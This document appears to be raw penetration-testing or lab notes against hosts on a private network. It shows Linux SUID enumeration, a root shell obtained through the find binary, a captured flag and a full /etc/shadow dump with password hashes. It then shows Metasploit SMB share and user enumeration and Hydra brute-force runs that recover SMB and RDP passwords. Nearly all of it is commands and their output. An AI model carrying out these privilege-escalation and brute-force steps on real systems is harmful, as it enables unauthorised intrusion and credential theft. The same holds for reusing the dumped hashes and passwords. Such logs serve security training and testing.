/snap/core22/2292/usr/bin/sudo
/snap/core22/2292/usr/bin/umount
/snap/core22/2292/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core22/2292/usr/lib/openssh/ssh-keysign
/snap/core22/2292/usr/libexec/polkit-agent-helper-1
/snap/core20/2686/usr/bin/chfn
/snap/core20/2686/usr/bin/chsh
/snap/core20/2686/usr/bin/gpasswd
/snap/core20/2686/usr/bin/mount
/snap/core20/2686/usr/bin/newgrp
/snap/core20/2686/usr/bin/passwd
/snap/core20/2686/usr/bin/su
/snap/core20/2686/usr/bin/sudo
/snap/core20/2686/usr/bin/umount
/snap/core20/2686/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/2686/usr/lib/openssh/ssh-keysign
/snap/core20/1405/usr/bin/chfn
/snap/core20/1405/usr/bin/chsh
/snap/core20/1405/usr/bin/gpasswd
/snap/core20/1405/usr/bin/mount
/snap/core20/1405/usr/bin/newgrp
/snap/core20/1405/usr/bin/passwd
/snap/core20/1405/usr/bin/su
/snap/core20/1405/usr/bin/sudo
/snap/core20/1405/usr/bin/umount
/snap/core20/1405/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1405/usr/lib/openssh/ssh-keysign
/snap/core18/2344/bin/mount
/snap/core18/2344/bin/ping
/snap/core18/2344/bin/su
/snap/core18/2344/bin/umount
/snap/core18/2344/usr/bin/chfn
/snap/core18/2344/usr/bin/chsh
/snap/core18/2344/usr/bin/gpasswd
/snap/core18/2344/usr/bin/newgrp
/snap/core18/2344/usr/bin/passwd
/snap/core18/2344/usr/bin/sudo
/snap/core18/2344/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2344/usr/lib/openssh/ssh-keysign
/snap/core18/2979/bin/mount
/snap/core18/2979/bin/ping
/snap/core18/2979/bin/su
/snap/core18/2979/bin/umount
/snap/core18/2979/usr/bin/chfn
/snap/core18/2979/usr/bin/chsh
/snap/core18/2979/usr/bin/gpasswd
/snap/core18/2979/usr/bin/newgrp
/snap/core18/2979/usr/bin/passwd
/snap/core18/2979/usr/bin/sudo
/snap/core18/2979/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2979/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/lib/xorg/Xorg.wrap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/mount
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/at
/usr/bin/su
/usr/bin/umount
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/fusermount3
/usr/bin/pkexec
/usr/bin/find
/usr/bin/chfn
/usr/bin/chsh
/var/lib/docker/overlay2/748357252b1b08b768d345ba7286deed9cb9941b64e5e0fa29d21008751f5b70/merged/usr/bin/mount
/var/lib/docker/overlay2/748357252b1b08b768d345ba7286deed9cb9941b64e5e0fa29d21008751f5b70/merged/usr/bin/newgrp
/var/lib/docker/overlay2/748357252b1b08b768d345ba7286deed9cb9941b64e5e0fa29d21008751f5b70/merged/usr/bin/su
/var/lib/docker/overlay2/748357252b1b08b768d345ba7286deed9cb9941b64e5e0fa29d21008751f5b70/merged/usr/bin/umount
/var/lib/docker/overlay2/748357252b1b08b768d345ba7286deed9cb9941b64e5e0fa29d21008751f5b70/merged/usr/bin/passwd
/var/lib/docker/overlay2/748357252b1b08b768d345ba7286deed9cb9941b64e5e0fa29d21008751f5b70/merged/usr/bin/gpasswd
/var/lib/docker/overlay2/748357252b1b08b768d345ba7286deed9cb9941b64e5e0fa29d21008751f5b70/merged/usr/bin/chfn
/var/lib/docker/overlay2/748357252b1b08b768d345ba7286deed9cb9941b64e5e0fa29d21008751f5b70/merged/usr/bin/chsh
/var/lib/docker/overlay2/1a34eeb83e724ba837e1872b8d0a82de8b3aa33d76a1236aafd40d4e65a437f8/diff/usr/bin/mount
/var/lib/docker/overlay2/1a34eeb83e724ba837e1872b8d0a82de8b3aa33d76a1236aafd40d4e65a437f8/diff/usr/bin/newgrp
/var/lib/docker/overlay2/1a34eeb83e724ba837e1872b8d0a82de8b3aa33d76a1236aafd40d4e65a437f8/diff/usr/bin/su
/var/lib/docker/overlay2/1a34eeb83e724ba837e1872b8d0a82de8b3aa33d76a1236aafd40d4e65a437f8/diff/usr/bin/umount
/var/lib/docker/overlay2/1a34eeb83e724ba837e1872b8d0a82de8b3aa33d76a1236aafd40d4e65a437f8/diff/usr/bin/passwd
/var/lib/docker/overlay2/1a34eeb83e724ba837e1872b8d0a82de8b3aa33d76a1236aafd40d4e65a437f8/diff/usr/bin/gpasswd
/var/lib/docker/overlay2/1a34eeb83e724ba837e1872b8d0a82de8b3aa33d76a1236aafd40d4e65a437f8/diff/usr/bin/chfn
/var/lib/docker/overlay2/1a34eeb83e724ba837e1872b8d0a82de8b3aa33d76a1236aafd40d4e65a437f8/diff/usr/bin/chsh
dbadmin@ip-192-168-100-52:/$ ls -l /etc/passwd
-rw-r--r-- 1 root root 2823 Apr 18  2022 /etc/passwd
dbadmin@ip-192-168-100-52:/$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
dbadmin@ip-192-168-100-52:/$ ls -la /etc/cron*
-rw-r--r-- 1 root root 1042 Feb 13  2020 /etc/crontab

/etc/cron.d:
total 32
drwxr-xr-x   2 root root  4096 Apr 17  2022 .
drwxr-xr-x 146 root root 12288 Feb 10 17:19 ..
-rw-r--r--   1 root root   102 Feb 13  2020 .placeholder
-rw-r--r--   1 root root   201 Feb 14  2020 e2scrub_all
-rw-r--r--   1 root root   712 Mar 27  2020 php
-rw-r--r--   1 root root   190 Nov 29  2021 popularity-contest

/etc/cron.daily:
total 68
drwxr-xr-x   2 root root  4096 Apr 17  2022 .
drwxr-xr-x 146 root root 12288 Feb 10 17:19 ..
-rw-r--r--   1 root root   102 Feb 13  2020 .placeholder
-rwxr-xr-x   1 root root   539 Sep 30  2020 apache2
-rwxr-xr-x   1 root root   376 Dec  4  2019 apport
-rwxr-xr-x   1 root root  1478 Apr  9  2020 apt-compat
-rwxr-xr-x   1 root root   355 Dec 29  2017 bsdmainutils
-rwxr-xr-x   1 root root   384 Nov 19  2019 cracklib-runtime
-rwxr-xr-x   1 root root  1187 Sep  5  2019 dpkg
-rwxr-xr-x   1 root root   377 Jan 21  2019 logrotate
-rwxr-xr-x   1 root root  1123 Feb 25  2020 man-db
-rwxr-xr-x   1 root root  4574 Jul 18  2019 popularity-contest
-rwxr-xr-x   1 root root   383 Mar  9  2022 samba
-rwxr-xr-x   1 root root   214 May 14  2021 update-notifier-common

/etc/cron.hourly:
total 20
drwxr-xr-x   2 root root  4096 Nov 29  2021 .
drwxr-xr-x 146 root root 12288 Feb 10 17:19 ..
-rw-r--r--   1 root root   102 Feb 13  2020 .placeholder

/etc/cron.monthly:
total 20
drwxr-xr-x   2 root root  4096 Nov 29  2021 .
drwxr-xr-x 146 root root 12288 Feb 10 17:19 ..
-rw-r--r--   1 root root   102 Feb 13  2020 .placeholder

/etc/cron.weekly:
total 28
drwxr-xr-x   2 root root  4096 Nov 29  2021 .
drwxr-xr-x 146 root root 12288 Feb 10 17:19 ..
-rw-r--r--   1 root root   102 Feb 13  2020 .placeholder
-rwxr-xr-x   1 root root   813 Feb 25  2020 man-db
-rwxr-xr-x   1 root root   403 Aug  5  2021 update-notifier-common
dbadmin@ip-192-168-100-52:/$ 

--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------
--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------

got root !!!
/usr/bin/find . -exec /bin/sh -p \; -quit

# cat /root/flag.txt
905afdff29b84b2a9d5060a179a1360a

cat /etc/shadow
root:$6$v8b2/P8T26uEUwvM$TBiao8o1dfqQrGPPcebRj6A6cNiixcy6/r/AFtN5Swk7N1kpg/8UyQK0pXFwdLfy5Ed/71VN91nJ6.3JyAN/00:18998:0:99999:7:::
daemon:*:18960:0:99999:7:::
bin:*:18960:0:99999:7:::
sys:*:18960:0:99999:7:::
sync:*:18960:0:99999:7:::
games:*:18960:0:99999:7:::
man:*:18960:0:99999:7:::
lp:*:18960:0:99999:7:::
mail:*:18960:0:99999:7:::
news:*:18960:0:99999:7:::
uucp:*:18960:0:99999:7:::
proxy:*:18960:0:99999:7:::
www-data:*:18960:0:99999:7:::
backup:*:18960:0:99999:7:::
list:*:18960:0:99999:7:::
irc:*:18960:0:99999:7:::
gnats:*:18960:0:99999:7:::
nobody:*:18960:0:99999:7:::
systemd-network:*:18960:0:99999:7:::
systemd-resolve:*:18960:0:99999:7:::
systemd-timesync:*:18960:0:99999:7:::
messagebus:*:18960:0:99999:7:::
syslog:*:18960:0:99999:7:::
_apt:*:18960:0:99999:7:::
tss:*:18960:0:99999:7:::
uuidd:*:18960:0:99999:7:::
tcpdump:*:18960:0:99999:7:::
sshd:*:18960:0:99999:7:::
landscape:*:18960:0:99999:7:::
pollinate:*:18960:0:99999:7:::
ec2-instance-connect:!:18960:0:99999:7:::
systemd-coredump:!!:18998::::::
ubuntu:!:18998:0:99999:7:::
lxd:!:18998::::::
rtkit:*:18998:0:99999:7:::
xrdp:!:18998:0:99999:7:::
dnsmasq:*:18998:0:99999:7:::
usbmux:*:18998:0:99999:7:::
avahi:*:18998:0:99999:7:::
cups-pk-helper:*:18998:0:99999:7:::
pulse:*:18998:0:99999:7:::
geoclue:*:18998:0:99999:7:::
saned:*:18998:0:99999:7:::
colord:*:18998:0:99999:7:::
sddm:*:18998:0:99999:7:::
gdm:*:18998:0:99999:7:::
auditor:$6$RNJCCrE9ok/yCMqD$7uPoYFsrnR3wPnSwPeLuBEiXgAzlOzGW6uZSyX.IjNNVcR5.bDBhb.dlZTN37JJR4yZXXQTetuUhOOX9ZNov6/:19099:0:99999:7:::
dbadmin:$6$1HAbXNNxXVVNCcoi$6Zy2gjvyZZYHTwSyxSLsdv0LA.5hA7EeD1WhUFzHg9SOSXrz7DxX7iG0mCQbmEBSo.yjB1c80iIujSM6Fjbpo/:19099:0:99999:7:::
mysql:!:19099:0:99999:7:::
ftp:*:19100:0:99999:7:::
# 

--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------
--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------

exec: smbclient //192.168.100.50/C$ -U mike

Enter WORKGROUP\mike's password: 
tree connect failed: NT_STATUS_ACCESS_DENIED
msf6 > use auxiliary/scanner/smb/smb_enumshares
[*] Using configured payload windows/x64/meterpreter_reverse_tcp
msf6 auxiliary(scanner/smb/smb_enumshares) > show op
[-] Invalid parameter "op", use "show -h" for more information
msf6 auxiliary(scanner/smb/smb_enumshares) > show options 

Module options (auxiliary/scanner/smb/smb_enumshares):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   LogSpider       3                no        0 = disabled, 1 = CSV, 2 = table (txt), 3 = one liner (txt) (Accepted: 0, 1,
                                              2, 3)
   MaxDepth        999              yes       Max number of subdirectories to spider
   RHOSTS          192.168.100.50   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/U
                                              sing-Metasploit
   SMBDomain       .                no        The Windows domain to use for authentication
   SMBPass         diamond          no        The password for the specified username
   SMBUser         mike             no        The username to authenticate as
   ShowFiles       false            yes       Show detailed information when spidering
   SpiderProfiles  true             no        Spider only user profiles when share = C$
   SpiderShares    false            no        Spider shares recursively
   THREADS         1                yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/smb/smb_enumshares) > run

[-] 192.168.100.50:139    - Login Failed: Unable to negotiate SMB1 with the remote host: Not a valid SMB packet
[!] 192.168.100.50:445    - peer_native_os is only available with SMB1 (current version: SMB3)
[!] 192.168.100.50:445    - peer_native_lm is only available with SMB1 (current version: SMB3)
[+] 192.168.100.50:445    - ADMIN$ - (DISK) Remote Admin
[+] 192.168.100.50:445    - C$ - (DISK) Default share
[+] 192.168.100.50:445    - IPC$ - (IPC) Remote IPC
[+] 192.168.100.50:445    - print$ - (DISK) Printer Drivers
[*] 192.168.100.50:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_enumshares) > use auxiliary/scanner/smb/smb_enumusers
[*] Using configured payload windows/x64/meterpreter_reverse_tcp
msf6 auxiliary(scanner/smb/smb_enumusers) > show options 

Module options (auxiliary/scanner/smb/smb_enumusers):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DB_ALL_USERS  false            no        Add all enumerated usernames to the database
   RHOSTS        192.168.100.50   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usi
                                            ng-Metasploit
   SMBDomain     .                no        The Windows domain to use for authentication
   SMBPass       diamond          no        The password for the specified username
   SMBUser       mike             no        The username to authenticate as
   THREADS       1                yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/smb/smb_enumusers) > run

[+] 192.168.100.50:445    - WINSERVER-01 [ admin, Administrator, Guest, mike, vince ] ( LockoutTries=0 PasswordMin=0 )
[*] 192.168.100.50:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_enumusers) > 

--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------
--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------

hydra -L users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt smb://192.168.100.50
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-11 12:52:50
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 3027 login tries (l:3/p:1009), ~3027 tries per task
[DATA] attacking smb://192.168.100.50:445/
[445][smb] host: 192.168.100.50   login: vince   password: greenday
[445][smb] host: 192.168.100.50   login: admin   password: superman
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-02-11 12:53:03
root@kali:~# featherpad users.txt
QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'
root@kali:~# 


hydra -l administrator -P /usr/share/wordlists/rockyou.txt smb://192.168.100.55Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-11 17:00:15
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://192.168.100.55:445/
[445][smb] host: 192.168.100.55   login: administrator   password: swordfish
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-02-11 17:00:33
root@kali:~# 


hydra -l admin -P /usr/share/wordlists/rockyou.txt rdp://192.168.100.50
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-11 18:54:55
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking rdp://192.168.100.50:3389/
[3389][rdp] host: 192.168.100.50   login: admin   password: superman
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-02-11 18:55:01
root@kali:~# 
